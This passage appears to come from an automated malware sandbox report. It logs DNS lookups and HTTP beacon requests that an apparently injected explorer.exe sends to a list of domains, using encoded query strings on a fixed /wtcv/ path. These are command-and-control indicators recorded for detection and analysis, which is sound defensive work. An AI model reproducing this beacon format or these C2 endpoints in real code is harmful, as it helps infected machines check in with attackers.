                                                Nov 4, 2021 11:50:03.433895111 CET804977935.246.6.109192.168.2.6
                                                Nov 4, 2021 11:50:03.434012890 CET4977980192.168.2.635.246.6.109
                                                Nov 4, 2021 11:50:03.434360027 CET4977980192.168.2.635.246.6.109
                                                Nov 4, 2021 11:50:03.468027115 CET804977935.246.6.109192.168.2.6
                                                Nov 4, 2021 11:50:03.508599043 CET804977935.246.6.109192.168.2.6
                                                Nov 4, 2021 11:50:03.508635998 CET804977935.246.6.109192.168.2.6
                                                Nov 4, 2021 11:50:03.508655071 CET804977935.246.6.109192.168.2.6
                                                Nov 4, 2021 11:50:03.508694887 CET804977935.246.6.109192.168.2.6
                                                Nov 4, 2021 11:50:03.508887053 CET4977980192.168.2.635.246.6.109
                                                Nov 4, 2021 11:50:03.508944035 CET4977980192.168.2.635.246.6.109
                                                Nov 4, 2021 11:50:03.512593031 CET4977980192.168.2.635.246.6.109
                                                Nov 4, 2021 11:50:03.546569109 CET804977935.246.6.109192.168.2.6

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Nov 4, 2021 11:49:10.172384977 CET5177453192.168.2.68.8.8.8
                                                Nov 4, 2021 11:49:10.202804089 CET53517748.8.8.8192.168.2.6
                                                Nov 4, 2021 11:49:15.357218981 CET5602353192.168.2.68.8.8.8
                                                Nov 4, 2021 11:49:15.389322996 CET53560238.8.8.8192.168.2.6
                                                Nov 4, 2021 11:49:20.540076017 CET5838453192.168.2.68.8.8.8
                                                Nov 4, 2021 11:49:20.563623905 CET53583848.8.8.8192.168.2.6
                                                Nov 4, 2021 11:49:25.845139980 CET5606153192.168.2.68.8.8.8
                                                Nov 4, 2021 11:49:26.097970963 CET53560618.8.8.8192.168.2.6
                                                Nov 4, 2021 11:49:36.942981958 CET5833653192.168.2.68.8.8.8
                                                Nov 4, 2021 11:49:36.963466883 CET53583368.8.8.8192.168.2.6
                                                Nov 4, 2021 11:49:42.073613882 CET5378153192.168.2.68.8.8.8
                                                Nov 4, 2021 11:49:42.109395027 CET53537818.8.8.8192.168.2.6
                                                Nov 4, 2021 11:49:47.123650074 CET5406453192.168.2.68.8.8.8
                                                Nov 4, 2021 11:49:47.145673037 CET53540648.8.8.8192.168.2.6
                                                Nov 4, 2021 11:49:52.706044912 CET5281153192.168.2.68.8.8.8
                                                Nov 4, 2021 11:49:52.729083061 CET53528118.8.8.8192.168.2.6
                                                Nov 4, 2021 11:49:57.837305069 CET5529953192.168.2.68.8.8.8
                                                Nov 4, 2021 11:49:57.860071898 CET53552998.8.8.8192.168.2.6
                                                Nov 4, 2021 11:50:03.351473093 CET6374553192.168.2.68.8.8.8
                                                Nov 4, 2021 11:50:03.392386913 CET53637458.8.8.8192.168.2.6
                                                Nov 4, 2021 11:50:08.528608084 CET5005553192.168.2.68.8.8.8
                                                Nov 4, 2021 11:50:08.554653883 CET53500558.8.8.8192.168.2.6

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                Nov 4, 2021 11:49:10.172384977 CET192.168.2.68.8.8.80x9f44Standard query (0)www.worryterrible.spaceA (IP address)IN (0x0001)
                                                Nov 4, 2021 11:49:15.357218981 CET192.168.2.68.8.8.80x646aStandard query (0)www.americanvisionvinyl.comA (IP address)IN (0x0001)
                                                Nov 4, 2021 11:49:20.540076017 CET192.168.2.68.8.8.80x9f1fStandard query (0)www.iccsukltd.comA (IP address)IN (0x0001)
                                                Nov 4, 2021 11:49:25.845139980 CET192.168.2.68.8.8.80x1e93Standard query (0)www.harada-insatsu.comA (IP address)IN (0x0001)
                                                Nov 4, 2021 11:49:36.942981958 CET192.168.2.68.8.8.80x3276Standard query (0)www.affiliatemarketingproducts.xyzA (IP address)IN (0x0001)
                                                Nov 4, 2021 11:49:42.073613882 CET192.168.2.68.8.8.80xd1e8Standard query (0)www.dempseynutrition.comA (IP address)IN (0x0001)
                                                Nov 4, 2021 11:49:47.123650074 CET192.168.2.68.8.8.80x226dStandard query (0)www.bezhantrading.comA (IP address)IN (0x0001)
                                                Nov 4, 2021 11:49:52.706044912 CET192.168.2.68.8.8.80x1c5bStandard query (0)www.alles-abgedeckt.comA (IP address)IN (0x0001)
                                                Nov 4, 2021 11:49:57.837305069 CET192.168.2.68.8.8.80x5d27Standard query (0)www.leads-mania.clubA (IP address)IN (0x0001)
                                                Nov 4, 2021 11:50:03.351473093 CET192.168.2.68.8.8.80xbfb5Standard query (0)www.tankomixing.comA (IP address)IN (0x0001)
                                                Nov 4, 2021 11:50:08.528608084 CET192.168.2.68.8.8.80x7132Standard query (0)www.sddn13.xyzA (IP address)IN (0x0001)

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                Nov 4, 2021 11:49:10.202804089 CET8.8.8.8192.168.2.60x9f44No error (0)www.worryterrible.spaceworryterrible.spaceCNAME (Canonical name)IN (0x0001)
                                                Nov 4, 2021 11:49:10.202804089 CET8.8.8.8192.168.2.60x9f44No error (0)worryterrible.space34.102.136.180A (IP address)IN (0x0001)
                                                Nov 4, 2021 11:49:15.389322996 CET8.8.8.8192.168.2.60x646aNo error (0)www.americanvisionvinyl.comamericanvisionvinyl.comCNAME (Canonical name)IN (0x0001)
                                                Nov 4, 2021 11:49:15.389322996 CET8.8.8.8192.168.2.60x646aNo error (0)americanvisionvinyl.com34.102.136.180A (IP address)IN (0x0001)
                                                Nov 4, 2021 11:49:20.563623905 CET8.8.8.8192.168.2.60x9f1fNo error (0)www.iccsukltd.com217.160.0.33A (IP address)IN (0x0001)
                                                Nov 4, 2021 11:49:26.097970963 CET8.8.8.8192.168.2.60x1e93No error (0)www.harada-insatsu.comharada-insatsu.comCNAME (Canonical name)IN (0x0001)
                                                Nov 4, 2021 11:49:26.097970963 CET8.8.8.8192.168.2.60x1e93No error (0)harada-insatsu.com153.127.214.206A (IP address)IN (0x0001)
                                                Nov 4, 2021 11:49:36.963466883 CET8.8.8.8192.168.2.60x3276No error (0)www.affiliatemarketingproducts.xyz172.67.184.156A (IP address)IN (0x0001)
                                                Nov 4, 2021 11:49:36.963466883 CET8.8.8.8192.168.2.60x3276No error (0)www.affiliatemarketingproducts.xyz104.21.68.12A (IP address)IN (0x0001)
                                                Nov 4, 2021 11:49:42.109395027 CET8.8.8.8192.168.2.60xd1e8Name error (3)www.dempseynutrition.comnonenoneA (IP address)IN (0x0001)
                                                Nov 4, 2021 11:49:47.145673037 CET8.8.8.8192.168.2.60x226dNo error (0)www.bezhantrading.combezhantrading.comCNAME (Canonical name)IN (0x0001)
                                                Nov 4, 2021 11:49:47.145673037 CET8.8.8.8192.168.2.60x226dNo error (0)bezhantrading.com104.248.163.187A (IP address)IN (0x0001)
                                                Nov 4, 2021 11:49:52.729083061 CET8.8.8.8192.168.2.60x1c5bNo error (0)www.alles-abgedeckt.com46.38.243.234A (IP address)IN (0x0001)
                                                Nov 4, 2021 11:49:57.860071898 CET8.8.8.8192.168.2.60x5d27No error (0)www.leads-mania.clubleads-mania.clubCNAME (Canonical name)IN (0x0001)
                                                Nov 4, 2021 11:49:57.860071898 CET8.8.8.8192.168.2.60x5d27No error (0)leads-mania.club138.68.74.116A (IP address)IN (0x0001)
                                                Nov 4, 2021 11:50:03.392386913 CET8.8.8.8192.168.2.60xbfb5No error (0)www.tankomixing.comwww150.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                Nov 4, 2021 11:50:03.392386913 CET8.8.8.8192.168.2.60xbfb5No error (0)www150.wixdns.netbalancer.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                Nov 4, 2021 11:50:03.392386913 CET8.8.8.8192.168.2.60xbfb5No error (0)balancer.wixdns.net5f36b111-balancer.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                Nov 4, 2021 11:50:03.392386913 CET8.8.8.8192.168.2.60xbfb5No error (0)5f36b111-balancer.wixdns.nettd-balancer-euw2-6-109.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                Nov 4, 2021 11:50:03.392386913 CET8.8.8.8192.168.2.60xbfb5No error (0)td-balancer-euw2-6-109.wixdns.net35.246.6.109A (IP address)IN (0x0001)
                                                Nov 4, 2021 11:50:08.554653883 CET8.8.8.8192.168.2.60x7132No error (0)www.sddn13.xyzsddn13.xyzCNAME (Canonical name)IN (0x0001)
                                                Nov 4, 2021 11:50:08.554653883 CET8.8.8.8192.168.2.60x7132No error (0)sddn13.xyz50.118.182.205A (IP address)IN (0x0001)

                                                HTTP Request Dependency Graph

                                                • www.worryterrible.space
                                                • www.americanvisionvinyl.com
                                                • www.iccsukltd.com
                                                • www.harada-insatsu.com
                                                • www.affiliatemarketingproducts.xyz
                                                • www.bezhantrading.com
                                                • www.alles-abgedeckt.com
                                                • www.leads-mania.club
                                                • www.tankomixing.com

                                                HTTP Packets

                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                0192.168.2.64976034.102.136.18080C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Nov 4, 2021 11:49:10.230787992 CET1211OUTGET /wtcv/?g2ML=crBLeffhPhH0&6lpD=T+sBBhD+jNCXQwtHdmguBNleR0ygENBETJPwbdwO/+mZKIq0Z0gdUrlML9Z9p+t2mZBgFheVMw== HTTP/1.1
                                                Host: www.worryterrible.space
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Nov 4, 2021 11:49:10.345949888 CET1211INHTTP/1.1 403 Forbidden
                                                Server: openresty
                                                Date: Thu, 04 Nov 2021 10:49:10 GMT
                                                Content-Type: text/html
                                                Content-Length: 275
                                                ETag: "6182ae77-113"
                                                Via: 1.1 google
                                                Connection: close
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                1192.168.2.64976634.102.136.18080C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Nov 4, 2021 11:49:15.409408092 CET5924OUTGET /wtcv/?6lpD=S1gCkNmaG9RWB/pKREaVLOJX/KdzA8KUzxvMSJydFpcLjSWhmPt8MQ7tAXeYu3xo2zwBelgJSg==&g2ML=crBLeffhPhH0 HTTP/1.1
                                                Host: www.americanvisionvinyl.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Nov 4, 2021 11:49:15.526365042 CET5924INHTTP/1.1 403 Forbidden
                                                Server: openresty
                                                Date: Thu, 04 Nov 2021 10:49:15 GMT
                                                Content-Type: text/html
                                                Content-Length: 275
                                                ETag: "6182b3d6-113"
                                                Via: 1.1 google
                                                Connection: close
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                2192.168.2.649770217.160.0.3380C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Nov 4, 2021 11:49:20.590734005 CET7551OUTGET /wtcv/?g2ML=crBLeffhPhH0&6lpD=avBZXYWwHS+0cE4x4OhaeduPUSE/+pj8feHEWqkpfSZeSdEeZDPav/r/n85naepg7UJMR8VNdw== HTTP/1.1
                                                Host: www.iccsukltd.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Nov 4, 2021 11:49:20.613830090 CET7552INHTTP/1.1 302 Moved Temporarily
                                                Server: nginx
                                                Date: Thu, 04 Nov 2021 10:49:20 GMT
                                                Content-Type: text/html
                                                Content-Length: 138
                                                Connection: close
                                                Location: https://www.iccsukltd.com/wtcv/?g2ML=crBLeffhPhH0&6lpD=avBZXYWwHS+0cE4x4OhaeduPUSE/+pj8feHEWqkpfSZeSdEeZDPav/r/n85naepg7UJMR8VNdw==
                                                Expires: Thu, 04 Nov 2021 11:09:20 GMT
                                                Cache-Control: max-age=1200
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                3192.168.2.649773153.127.214.20680C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Nov 4, 2021 11:49:26.412220001 CET7561OUTGET /wtcv/?6lpD=3PEHh71NGJ6azwdPIaKj9SJxQ5GIvylohbG4MidSx9GNzMWuTZ2Cml2qwvbSyEbxmGLLoGUQ/A==&g2ML=crBLeffhPhH0 HTTP/1.1
                                                Host: www.harada-insatsu.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Nov 4, 2021 11:49:27.061523914 CET7561INHTTP/1.1 301 Moved Permanently
                                                Server: nginx
                                                Date: Thu, 04 Nov 2021 10:49:26 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Content-Length: 0
                                                Connection: close
                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                X-Redirect-By: WordPress
                                                Location: http://harada-insatsu.com/wtcv/?6lpD=3PEHh71NGJ6azwdPIaKj9SJxQ5GIvylohbG4MidSx9GNzMWuTZ2Cml2qwvbSyEbxmGLLoGUQ/A==&g2ML=crBLeffhPhH0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                4192.168.2.649774172.67.184.15680C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Nov 4, 2021 11:49:36.988871098 CET7563OUTGET /wtcv/?6lpD=n99BCbv8t7R76U7aWl+Y4jwhCBMXqFH3Ss3s1uofAFeCknYKTX6A2ZhN+sblY4y892kijutCfw==&g2ML=crBLeffhPhH0 HTTP/1.1
                                                Host: www.affiliatemarketingproducts.xyz
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Nov 4, 2021 11:49:37.027247906 CET7564INHTTP/1.1 301 Moved Permanently
                                                Date: Thu, 04 Nov 2021 10:49:37 GMT
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Cache-Control: max-age=3600
                                                Expires: Thu, 04 Nov 2021 11:49:37 GMT
                                                Location: https://www.affiliatemarketingproducts.xyz/wtcv/?6lpD=n99BCbv8t7R76U7aWl+Y4jwhCBMXqFH3Ss3s1uofAFeCknYKTX6A2ZhN+sblY4y892kijutCfw==&g2ML=crBLeffhPhH0
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SPswaYNzBNI3Kt4mtbfGsNGfaa%2FkZUQW2IRP4os7vY69Hkz9OlKNWJOADCzrBTJzBOFhRTVCuWC4G%2FBpJgHLPTtPcRGkhO%2B8zEWipfS%2BaMIRKeeVD0wb5edUjB31NBc2rZfYdeH8pNowyK5alp3qulaeUFLI"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 6a8d46d64fc84c5b-AMS
                                                alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                5192.168.2.649776104.248.163.18780C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Nov 4, 2021 11:49:47.179642916 CET7569OUTGET /wtcv/?6lpD=U8NG9FaSD2kxZB2OJ0E9golv5lIIWRC0uShqIwpBJZHTTqOYZoxmZrRB+XQzKwloE4eQBzh5Yg==&g2ML=crBLeffhPhH0 HTTP/1.1
                                                Host: www.bezhantrading.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Nov 4, 2021 11:49:47.760755062 CET7570INHTTP/1.1 301 Moved Permanently
                                                Connection: close
                                                content-type: text/html; charset=UTF-8
                                                expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                cache-control: no-cache, must-revalidate, max-age=0
                                                x-redirect-by: WordPress
                                                location: http://bezhantrading.com/wtcv/?6lpD=U8NG9FaSD2kxZB2OJ0E9golv5lIIWRC0uShqIwpBJZHTTqOYZoxmZrRB+XQzKwloE4eQBzh5Yg==&g2ML=crBLeffhPhH0
                                                content-length: 0
                                                date: Thu, 04 Nov 2021 10:49:47 GMT
                                                server: LiteSpeed
                                                vary: User-Agent


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                6192.168.2.64977746.38.243.23480C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Nov 4, 2021 11:49:52.756943941 CET7571OUTGET /wtcv/?g2ML=crBLeffhPhH0&6lpD=7rFvx+oOkIknJeLSGT6zdpK11SNx3XmCJl3+oL6bUqBoSOO899RABoVcVaGdEbUjg6Jp245BoA== HTTP/1.1
                                                Host: www.alles-abgedeckt.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Nov 4, 2021 11:49:52.781173944 CET7571INHTTP/1.1 404 Not Found
                                                Date: Thu, 04 Nov 2021 10:48:29 GMT
                                                Server: Apache/2.4.10 (Debian)
                                                Content-Length: 285
                                                Connection: close
                                                Content-Type: text/html; charset=iso-8859-1
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 61 6c 6c 65 73 2d 61 62 67 65 64 65 63 6b 74 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.10 (Debian) Server at www.alles-abgedeckt.com Port 80</address></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                7192.168.2.649778138.68.74.11680C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Nov 4, 2021 11:49:57.904726028 CET7572OUTGET /wtcv/?6lpD=6uadF/xtp6SIEZXRejc5eEgqqida81Lycer078wuaqskBH7+Y9BHXTO8hpDHVP52SXbct0O1Gw==&g2ML=crBLeffhPhH0 HTTP/1.1
                                                Host: www.leads-mania.club
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Nov 4, 2021 11:49:57.947346926 CET7573INHTTP/1.1 301 Moved Permanently
                                                Date: Thu, 04 Nov 2021 10:49:57 GMT
                                                Server: Apache/2.4.18 (Ubuntu)
                                                Location: https://www.leads-mania.club/wtcv/?6lpD=6uadF/xtp6SIEZXRejc5eEgqqida81Lycer078wuaqskBH7+Y9BHXTO8hpDHVP52SXbct0O1Gw==&g2ML=crBLeffhPhH0
                                                Content-Length: 432
                                                Connection: close
                                                Content-Type: text/html; charset=iso-8859-1
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6c 65 61 64 73 2d 6d 61 6e 69 61 2e 63 6c 75 62 2f 77 74 63 76 2f 3f 36 6c 70 44 3d 36 75 61 64 46 2f 78 74 70 36 53 49 45 5a 58 52 65 6a 63 35 65 45 67 71 71 69 64 61 38 31 4c 79 63 65 72 30 37 38 77 75 61 71 73 6b 42 48 37 2b 59 39 42 48 58 54 4f 38 68 70 44 48 56 50 35 32 53 58 62 63 74 30 4f 31 47 77 3d 3d 26 61 6d 70 3b 67 32 4d 4c 3d 63 72 42 4c 65 66 66 68 50 68 48 30 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 65 61 64 73 2d 6d 61 6e 69 61 2e 63 6c 75 62 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.leads-mania.club/wtcv/?6lpD=6uadF/xtp6SIEZXRejc5eEgqqida81Lycer078wuaqskBH7+Y9BHXTO8hpDHVP52SXbct0O1Gw==&amp;g2ML=crBLeffhPhH0">here</a>.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at www.leads-mania.club Port 80</address></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                8192.168.2.64977935.246.6.10980C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Nov 4, 2021 11:50:03.434360027 CET7574OUTGET /wtcv/?g2ML=crBLeffhPhH0&6lpD=ydnZOtJN4rL7t+2rr2QP2l64KaWWig+O10p3BIFftvtUQta9c9OEvE67gAwElgS+ahtVnBS/Rg== HTTP/1.1
                                                Host: www.tankomixing.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Nov 4, 2021 11:50:03.508599043 CET7576INHTTP/1.1 404 Not Found
                                                Date: Thu, 04 Nov 2021 10:50:03 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Content-Length: 2963
                                                Connection: close
                                                x-wix-request-id: 1636023003.449130355506120675
                                                Age: 0
                                                Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=euw2
                                                X-Seen-By: sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkVjVnh5Kklh0tOjeXRNYui2I,qquldgcFrj2n046g4RNSVOc9uRR3b9ESRFQmutE6otVYgeUJqUXtid+86vZww+nL,2d58ifebGbosy5xc+FRalt5/ToY82z3f1Iadd1mDV+wfoIgWdv1pdEYpwcIu9suB3fKEXQvQlSAkB/lstal9R17zYLyYyrK+fg616qIKE8c=,2UNV7KOq4oGjA5+PKsX47IJCkNcL1UXXT2AxlbYijuBYgeUJqUXtid+86vZww+nL,2+8df7/86SpxIBpm+VHpf+i/fkkIKkD/fZgnosx7etd9pAiCxHhredE3m8SaSeMp,l7Ey5khejq81S7sxGe5NkxC4MYanLpg+PuBnb2R7HRGTzRA6xkSHdTdM1EufzDIPWIHlCalF7YnfvOr2cMPpyw==,9y9YchCOVZDNGbMpBN9NeuuXxLvkVaG5VQb5mydxWWiYfoPtReGns7o6BqA+77AHvGQ2Otd3B2C27oTTIAKJtQ==
                                                Vary: Accept-Encoding
                                                X-Content-Type-Options: nosniff
                                                Server: Pepyaka/1.19.10
                                                Data Raw: 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 20 6e 67 2d 62 69 6e 64 3d 22 27 70 61 67 65 5f 74 69 74 6c 65 27 20 7c 20 74 72 61 6e 73 6c 61 74 65 22 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 